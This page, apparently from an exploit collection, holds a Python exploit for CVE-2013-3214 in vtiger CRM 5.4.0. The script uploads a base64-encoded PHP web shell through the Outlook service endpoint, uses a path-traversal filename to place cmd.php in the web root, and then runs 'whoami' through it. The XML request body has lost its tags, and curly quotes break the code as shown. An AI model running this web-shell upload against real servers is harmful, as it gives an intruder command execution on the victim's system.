CVE-2013-3214_vtiger_CRM_5.4.0_PHP代碼注入漏洞

# CVE-2013-3214 vtiger CRM 5.4.0 PHP代碼注入漏洞
==EXP==

#!/usr/bin/env python3

import requests
from base64 import b64encode

# parameters depend on environment.
host = '192.168.85.133'
port = 8888
uri = '/'

url = f'http://{host}:{port}{uri}vtigerservice.php?service=outlook'

headers = {'Content-Type': 'text/xml', 'charset': 'UTF-8'}


payload = """
";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "

“;
die;
}
?>
“””

encoded_payload = b64encode(payload.encode()).decode()
filename = “cmd.php”

data = f”””




ptFINT
{encoded_payload}
../../../../../../{filename}
{len(payload)}
php
Pbghh




“””

# send the requests

print(“Sending …”)
print(data)
requests.post(url, headers=headers, data=data)

print(“Test command whoami …”)
resp = requests.get(f’http://{host}:{port}{uri}{filename}?cmd=whoami’)

print(resp.text)